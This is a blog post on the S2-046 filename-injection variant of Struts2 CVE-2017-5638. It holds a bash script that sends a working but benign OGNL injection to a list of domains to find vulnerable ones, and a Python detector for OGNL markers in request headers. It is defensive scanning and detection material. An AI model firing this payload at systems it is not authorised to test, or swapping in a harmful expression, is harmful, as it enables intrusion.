
New attack vector in CVE-2017-5638

Yesterday HP research posted some interesting findings on a new way to exploit vulnerable Struts2 installations (CVE-2017-5638): injecting the malicious payload into the filename parameter of the Content-Disposition header. A payload placed there can evade rules deployed to catch payloads in the Content-Type header.

Again, the mitigation is the same – just upgrade your Struts. Here is a quick-and-dirty script to check whether any of your domains is vulnerable to this variant.

#!/bin/bash
# Usage: s2_046_poc.sh $domain_text_file. Results are exported to the vulnerable_list.csv file.
# By Nick Babkin, [email protected] incl. research works from frohoff and pwntester

boundary="x50"
content_type="multipart/form-data; boundary=$boundary"
# Harmless OGNL expression: if Struts evaluates it, the response carries the header
# "X-NewConcept-Struts: 9306000" (3000*3102), which is what the check below looks for.
payload="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-NewConcept-Struts',3000*3102)}"

# probe URL [extra curl options]: POST a multipart body whose Content-Disposition
# filename carries the payload (terminated by a NUL byte, the S2-046 trick) and
# print curl's verbose output, which includes the response headers.
probe() {
	local url="$1"; shift
	printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" \
		| curl -v "$@" --connect-timeout 2 "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- 2>&1
}

while IFS= read -r line; do
	echo "Checking ... $line"
	a=$(probe "http://$line")
	b=$(probe "https://$line" -k)
	c=$(probe "http://www.$line")
	d=$(probe "https://www.$line" -k)

	if [[ $a = *"9306000"* || $b = *"9306000"* || $c = *"9306000"* || $d = *"9306000"* ]]; then
		echo "$line is vulnerable!"
		echo "$line is vulnerable!" >> vulnerable_list.csv
	else
		echo "$line is not vulnerable :)"
		echo "$line is not vulnerable :)" >> vulnerable_list.csv
	fi
done < "${1}"
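For the detection side, here is an added example (mine, not part of the original post or the HP research) that inspects a request for OGNL expression markers in both places discussed above: the Content-Type header (the original variant) and the Content-Disposition filename (the new variant), including the NUL byte the script inserts after the payload. The sample requests are constructed here; the payload string is the one used by the script.

```python
import re

# Start of an OGNL expression ("%{" or "${") anywhere in a header value.
OGNL_MARKER = re.compile(rb"[%$]\{")
# filename parameter of a Content-Disposition part header.
FILENAME = re.compile(rb'^Content-Disposition:.*?filename="([^"]*)"', re.I | re.M)


def find_ognl(content_type: bytes, body: bytes) -> list:
    """Return findings naming every place an OGNL marker (or a NUL byte in a
    part filename, as used by the S2-046 variant) appears in the request."""
    findings = []
    if OGNL_MARKER.search(content_type):          # S2-045 style: expression in Content-Type
        findings.append("ognl in Content-Type header")
    m = re.search(rb"boundary=([^;\s]+)", content_type)
    if not m:                                     # not multipart: nothing more to parse
        return findings
    delimiter = b"--" + m.group(1).strip(b'"')
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                # closing delimiter "--boundary--"
            break
        part_headers = part.split(b"\r\n\r\n", 1)[0]
        for fm in FILENAME.finditer(part_headers):
            filename = fm.group(1)
            if OGNL_MARKER.search(filename):      # S2-046 style: expression in the filename
                findings.append("ognl in Content-Disposition filename")
            if b"\x00" in filename:
                findings.append("NUL byte in Content-Disposition filename")
    return findings


# Constructed sample requests (not captured traffic).
BOUNDARY = b"x50"
PAYLOAD = (b"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
           b".addHeader('X-NewConcept-Struts',3000*3102)}")
MULTIPART_CT = b"multipart/form-data; boundary=" + BOUNDARY


def multipart_body(filename: bytes) -> bytes:
    """Build a one-part multipart/form-data body with the given filename."""
    return (b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="foo"; filename="'
            + filename + b'"\r\nContent-Type: text/plain\r\n\r\nx\r\n--' + BOUNDARY + b"--\r\n\r\n")


S2_046_BODY = multipart_body(PAYLOAD + b"\x00b")   # payload in the filename, as the script sends it
BENIGN_BODY = multipart_body(b"report.txt")

if __name__ == "__main__":
    print("S2-046 body  :", find_ognl(MULTIPART_CT, S2_046_BODY))
    print("S2-045 header:", find_ognl(PAYLOAD, b""))   # expression as the Content-Type itself
    print("benign       :", find_ognl(MULTIPART_CT, BENIGN_BODY))
```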

Published in Coding


by Nick Babkin, (c) 2016-2017